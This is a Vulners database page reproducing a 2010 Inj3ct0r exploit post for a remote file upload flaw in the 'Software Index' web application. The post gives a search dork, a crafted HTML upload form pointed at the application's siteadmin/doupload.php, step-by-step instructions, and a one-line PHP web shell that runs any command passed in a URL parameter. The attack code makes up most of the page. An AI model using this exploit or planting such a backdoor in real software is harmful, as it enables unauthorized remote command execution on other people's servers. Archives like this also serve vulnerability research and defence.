Vulners
Lucene search
Software Index Remote Shell Upload
`=======================================================================
# Software Index (Remote File Upload) Exploit
=======================================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 #################################### 1
0 I'm indoushka member from Inj3ct0r Team 1
1 #################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
########################################################################
# Vendor: http://www.p30vel.ir/
# Date: 2010-05-27
# Author : indoushka
# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !
# Contact : [email protected]
# Home : www.arab-blackhat.co.cc
# Bug : Up
# Tested on : windows SP2 Français V.(Pnx2 2.0)
########################################################################
# Dork : Copyright 2010. Software Index
# Exploit By indoushka
<html>
<head>
<Title>Select Image File for uploading</Title>
<script language="JavaScript">
function checkFile()
{
if (form1.userfile.value == "")
{
alert(" Please choose a file to upload");
return (false);
}
if (form1.userfile.value.indexOf(".php") == -1 &&form1.userfile.value.indexOf(".png") == -1 &&form1.userfile.value.indexOf(".bmp") == -1 &&form1.userfile.value.indexOf(".jpeg") == -1 && form1.userfile.value.indexOf(".gif") == -1)
{
alert(" Please upload .gif/.jpg/.jpeg/.bmp/.png files only");
form1.userfile.value="";
form1.userfile.focus();
return (false);
}
return(true);
}
</script>
</head>
<body>
<b><font size="3">Upload Image</font>.</b>
<FORM ENCTYPE="multipart/form-data" ACTION="http://127.0.0.1/Software-Index-P30vel.ir/siteadmin/doupload.php?box=<?php echo $_REQUEST["box"]?>&func=2" METHOD=post ID=form1 NAME=form1 onSubmit="javscript:return checkFile(form1);">
<input type="hidden" name="id" value="<?php echo $_SESSION[ "username" ] ?>">
<input type="hidden" name="act" value="upload">
<table><tr><td>
<b><font size="3" color="#FFFFFF"><u><font color="#000000" size="2">Attachment</font></u></font></b>
<table>
<tr>
<td valign="top" width="15"><font color="#000000">1.</font></td>
<td width="470"><font color="#000000">To add an Attachment, click
the 'Browse' button to select the file to attach, or type the path
to the file in the Text-box below.</font></td>
</tr>
<tr>
<td valign="top" width="15"><font color="#000000">2.</font></td>
<td width="470"><font color="#000000">Then click Upload button to
complete the upload</font></td>
</tr>
<tr>
<td valign="top" width="15"><font color="#000000">3.</font></td>
<td width="470"><font color="#990000">NOTE</font><font color="#000000">:
The File transfer can take from a few seconds upto a few minutes
depending on the size of the attachment. Please be patient while
the attachment is being uploaded.</font></td>
</tr>
<tr>
<td valign="top" width="15"><font color="#000000">4.</font></td>
<td width="470"><font color="#990000">NOTE</font><font color="#000000">:
The File will be renamed if the file with the same name is present</font></td>
</tr>
</table>
</TD>
</TR>
<TR><TD><STRONG>Hit the [Browse] button to find the file on your computer.</STRONG><BR></TD></TR>
<TR><TD><strong>Image</strong>
<INPUT NAME=userfile SIZE=30 TYPE=file MaxFileSize="1000000">
<input type="hidden" name="MAX_FILE_SIZE" value="1000000">
</TD></TR>
<TR><TD> </TD></TR>
<TR><TD><input type="submit" value="Upload" name="uploadfile"></TD></TR>
<TR><TD>NOTE: Please be patient, you will not receive any notification until the
file is completely transferred.<BR><BR></TD></TR>
</table>
</FORM>
<!--
<Script Language="JavaScript">
function listattach(filename)
{
window.opener.document.form123.<?php //request.QueryString("box") ?>.value=filename
window.close()
}
</script>
<Input type=button value=Done onClick="listattach('<?php //echo filename ?>')">
-->
</body>
</html>
1 - Save as php or html and upload to your localhost or server
2 - use Backdoor
<?php
$cmd = $_GET['cmd'];
system($cmd);
?>
3 - you see where the file uploaded
Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
all my friend :
His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N
(cr4wl3r Let the poor live ) * RoAd_KiLlEr * AnGeL25dZ
---------------------------------------------------------------------------------------------------------------------------------
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Jun 2010 00:00Current
0.2Low risk
Vulners AI Score0.2